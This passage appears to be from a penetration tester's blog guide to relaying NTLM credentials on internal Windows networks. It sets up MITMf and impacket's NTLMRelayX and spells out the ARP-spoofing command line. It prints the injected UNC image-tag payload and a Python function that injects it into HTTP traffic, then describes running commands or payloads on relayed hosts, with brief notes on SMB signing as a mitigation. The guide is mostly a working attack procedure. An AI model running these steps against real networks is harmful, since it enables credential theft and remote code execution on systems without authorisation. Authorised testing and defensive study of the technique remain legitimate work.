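# connections 0..4 land on .5, .6, .7, .5, .6 in turn
```

With enough inbound connections from the MITM'd user, every host in the list eventually gets a relay attempt, which is why the attack works without guessing where the user is an admin.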

The rest of this guide will provide details on setting up, executing, and understanding these tools as well as some insight into some of the mitigations which clients can implement to help prevent these attacks.

Notes to the reader: There are two things that I cannot stress enough: how powerful and important MITM attacks are, and how dangerous MITM attacks are if executed improperly. I encourage anyone reading this that wishes to execute this in a client environment to do so, but only after you have tested the tools in a practice environment, are very comfortable with how the tools work, and have enough understanding to troubleshoot them and quickly recognize issues. We are all prone to mistakes, and even I have caused significant outages doing attacks such as ARP spoofing, but the more you know about how a tool works and the more care you take with it, the less likely you are to bring down the networks you are testing against. Always check your targets! Do not MITM large sets of hosts. Use focused attacks and take the time to review traffic. Understand who you are targeting in an MITM attack before executing. Use common sense. It has been a long time since I have caused any significant issues with MITM attacks, and 75-90% of my clients never notice the attack. If executed right, it is a powerful and stealthy attack in most environments.

One last pro tip: always run Wireshark (or a similar packet capture tool) when doing MITM attacks. This allows you to go back and look at the information you captured during the attack. Sometimes this is extremely relevant, and if you don't capture it, it may be gone forever.

*Sure, there is some luck involved, as the user might not have local admin anywhere, but I am just going to ignore that because 99% of the time they are a local admin somewhere. Also, if the system is properly patched, Microsoft has prevented relaying back to the same host that initiated the connection, so even if the user is a local admin on their own system, you won't be able to pop their own workstation.


Pulling off this attack requires two tools which are either installed by default on Kali or available via apt-get, but sadly neither works directly out of the box. I have provided a few details in this section to help you get started with these tools. Additional details can be obtained by reaching out to me.


I recommend downloading this tool to the /opt/ folder on your testing system and following the install instructions the project provides; a simple apt-get install on Kali does not work. The setup instructions include creating a Python virtual environment because the tool depends on some older Python libraries, and replacing those libraries in the default Python environment may break other tools on your system. One thing the instructions do not cover is how to leave a virtual environment or how to get back into one. The project's GitHub repository contains the installation instructions.

Entering an already created virtual environment:
To enter an already created virtual environment, you would use the “workon” command. For example, with MITMf, you would type on the command line:

#workon MITMf

Exiting a virtual environment:
To exit the current virtual environment, type "deactivate" and you will be brought back to a standard shell using your system's default Python environment.


By default, this tool is installed on Kali in /usr/share/doc/python-impacket/examples/, but it is sadly missing required dependencies, some of which are older Python libraries. I have not found any guides on getting this set up, so I will detail the steps here.
This tool is dependent on version 1.4.0 of the ldap3 library, which is neither the current version nor the version installed on Kali by default. To prevent breaking other tools in Kali which rely on a newer version of this library, I recommend setting up another virtual environment for this tool. To do this (assuming you went through the steps to set up MITMf and have virtual environments working for that tool), first create the virtual environment:

#mkvirtualenv ntlmrelayx -p /usr/bin/python2.7

Once inside a new virtual environment, we have little to no Python libraries installed. At the time of this writing, I had to install the following libraries:

  • impacket
  • pycrypto
  • pyopenssl
  • ldap3==1.4.0
  • ldapdomaindump

I installed each of these using the following command:

#pip install [library name]

They can also be installed in one shot: #pip install impacket pycrypto pyopenssl ldap3==1.4.0 ldapdomaindump

The last trip-up I had with this tool is that it is not written to be run in a virtual environment and takes some small tweaking to work here**. We need to change the shebang line from "#!/usr/bin/python" to "#!/usr/bin/env python2.7" so that it picks up the virtual environment's interpreter rather than the system one. I recommend creating a backup of the original before making any modifications. Once this is done, the tool should function as intended without causing issues to other tools on your system. Keep in mind that each time you use this tool, you will have to enter your virtual environment and run it from there.
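If you want to script the shebang fix (backup included), here is a minimal sketch. The script path is an assumption; point it at wherever ntlmrelayx.py lives on your system:

```python
import shutil

def fix_shebang(path, new_shebang="#!/usr/bin/env python2.7"):
    """Back up a script, then rewrite its shebang line so it uses
    whatever interpreter the active virtual environment provides."""
    shutil.copy(path, path + ".bak")  # keep a backup of the original
    with open(path) as f:
        lines = f.readlines()
    if lines and lines[0].startswith("#!"):
        lines[0] = new_shebang + "\n"
    with open(path, "w") as f:
        f.writelines(lines)

# Hypothetical usage:
# fix_shebang("/usr/share/doc/python-impacket/examples/ntlmrelayx.py")
```

The `env` form matters because `#!/usr/bin/python` hard-codes the system interpreter, while `#!/usr/bin/env python2.7` resolves the interpreter through PATH, which the virtual environment rewrites.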

** Huge thanks to Andy Bard for teaching me something new about Python and the difference between #!/usr/bin/python and #!/usr/bin/env python2.7 and helping me to get this tool to work in a virtual environment! I would still be breaking things on my system without this knowledge.

MITMf and SMBAuth:

Once we have all of the tools setup on our system we can start the actual attack. The first part of the attack requires us to establish a MITM connection between one or more targets and their gateway so that we can observe and manipulate their traffic. The most successful method I have found with this is to use ARP spoofing against 1-5 workstations on your local subnet. I am not going to dive into the risks of ARP spoofing or techniques for selecting targets here, but I will state that you should be careful of what/who you MITM and how many systems you MITM at a time.

The first step with any tool should almost always be the help command. Switch to the directory in which you installed MITMf (probably /opt/MITMf/) and run "./mitmf --help" to see the available switches and how to use them. With MITMf, we tell the tool that we want to do ARP spoofing with the "--spoof --arp" arguments. If we don't want to send gratuitous ARP, we can use "--spoof --arp --arpmode rpy" to only reply to ARP requests rather than initiating them ourselves. This method can be slightly stealthier but is usually less efficient.

While we are in a position to observe and control traffic, we can tell MITMf to identify plaintext HTTP traffic and automatically inject HTML code into it. In some situations this could be JavaScript to steal cookies or hook BeEF, but here we want to force the user's browser to authenticate to us over SMB, so we will use the "--SMBAuth" switch.

In total, we would run the following command from our MITMf virtual environment:

#./mitmf --spoof --arp --SMBAuth -i [interface] --gateway [gateway IP address] --targets [comma-separated list of target hosts or ranges]

Executing MITMf in a lab environment against a single target Windows 7 workstation

MITMf automatically injecting SMBAuth HTML payload into cleartext HTTP traffic

This switch exploits functionality built into Internet Explorer and Microsoft Edge for rendering images hosted on a file share. We trick the browser into thinking there are images available on a file share located at our IP address. Without any other tools, MITMf will detect the SMB connection and capture the NTLM hashes. For the purposes of this guide, we don't want to merely capture the hashes; we would rather relay them to our targets. For more details on that, skip down to the NTLMRelayX section of this guide. For more details on how SMBAuth works, see below.

Workings of SMBAuth:

The SMBAuth module built into MITMf works by observing network traffic, looking for cleartext HTTP traffic and specifically the "</body>" tag. If it finds this tag, it replaces it with multiple image tags followed by the original closing body tag. Below is a simple example of a server responding with HTML code and the code an attacker machine would inject; the injected content is the run of image tags before the closing body tag.

<title> Hello World </title>
Hello World
<img src="\\\image.jpg"><img src="file:////\image.jpg"><img src="moz-icon:file://%5c/\image.jpg"/></img></img></body>

Using view-source to look at the returned HTML code when hit by an MITM attack using Internet Explorer on Windows 7

These image tags tell Internet Explorer and Microsoft Edge to make an SMB connection, providing NTLM credentials to the target host in order to download the image.jpg file. For an attacker, this is wonderful; for an end user, terrible. As attackers, we can leverage the NTLMRelayX tool detailed below to relay the authentication information received to multiple systems on the network and execute code on any system where the MITM'd user has administrative rights and SMB signing is not enabled.
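The substitution SMBAuth performs boils down to a string replacement, which can be sketched in a few lines of Python. This is an illustration of the technique, not MITMf's actual plugin code, and the attacker IP is a placeholder:

```python
def inject_smbauth(html, attacker_ip="10.0.0.99"):
    """Replace the closing body tag with UNC-path image tags that
    coerce IE/Edge into making an authenticated SMB connection to
    the attacker, then restore the original closing tag."""
    payload = (
        '<img src="\\\\{ip}\\image.jpg">'
        '<img src="file://///{ip}/image.jpg">'
        '</body>'
    ).format(ip=attacker_ip)
    return html.replace("</body>", payload, 1)

# Example: a minimal server response before and after injection.
page = "<html><body>Hello World</body></html>"
injected = inject_smbauth(page)
```

In the real attack this rewrite happens on the wire against live HTTP responses, so the victim's browser renders the page normally while silently attempting the SMB fetch in the background.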

NOTE: Although I describe these two tools in this order, they must actually be run in reverse to work properly. You must first start NTLMRelayX in one shell, then kick off the MITM attack using MITMf. MITMf starts an SMB server by default (even with no modules loaded; check out the main function yourself), so running it first will lock up TCP port 445 and NTLMRelayX will not be able to start. MITMf will still run properly (for the purposes of this attack) if it cannot bind to that port because NTLMRelayX is already running.


For those of you who are familiar with SMBRelayX, NTLMRelayX should not look or feel much different at all once the dependencies are taken care of. This tool listens for NTLM connections and relays them to a list of specified hosts. We use "-tf [host list]" to define a file containing the list of hosts to target. We can optionally set the "-w" flag which, if enabled, will watch the file provided in the -tf argument for updates and add new targets as the file changes. In cases where you are still testing or have not yet enumerated all accessible Windows systems, this can be a useful switch.

Creating a target list with one IP per line to use with the "-tf" switch

Running NTLMRelayX with the -tf and -w switches

There are other options which are relevant on most penetration tests, such as "-c" to execute commands (including Empire payloads) or "-e" to upload and execute a file such as a custom MSF payload. If we do not specify either of these, the tool will automatically attempt its default action against the target host, dumping local password hashes.

Successful authentication and execution

In many cases, this will be enough to get you started on the post-exploitation phase of the penetration test, but in situations where additional protections keep the default action from being useful, I recommend using the "-e" or "-c" switches.

There are certain situations in which this attack will be stopped. As mentioned in the introduction, Microsoft released a patch which stops relaying hashes back to the originating host, so if the user is only a local admin on their own host, this will not be very useful. The other situation is when SMB signing is enabled, which is the case by default on domain controllers and can be the case on other servers or workstations in the environment.

Relaying credentials to a domain controller with SMB signing enabled and failing.


As mentioned above, one mitigation that prevents the relay portion of this attack is enabling SMB signing throughout the environment. I have heard various estimates of the network traffic overhead this causes; if there is any concern about capping out bandwidth, clients should take a risk-based approach to determine which systems should have SMB signing enabled.

SMB signing will only prevent the ability to relay credentials successfully; it provides no protection against capturing password hashes. With SMB signing enabled, we could still use the MITMf portion of this guide to capture credentials and run a wordlist/hybrid attack against the hash, hopefully recovering the plaintext password. In this situation, I would recommend using a browser other than Internet Explorer or Microsoft Edge. Both Chrome and Firefox can be configured to automatically send NTLM credentials to authenticate to an SMB server, but neither will do so by default. Per the research I have done, there is no way to disable this behavior in IE or Edge alone, only for the entire Windows system (which breaks basically everything…).

There are other solutions to prevent ARP spoofing, but to me this treats a symptom rather than the root cause: attackers on the internal network can use other MITM techniques to attack clients, and stopping ARP spoofing is no guaranteed protection against the damage MITM attacks can do.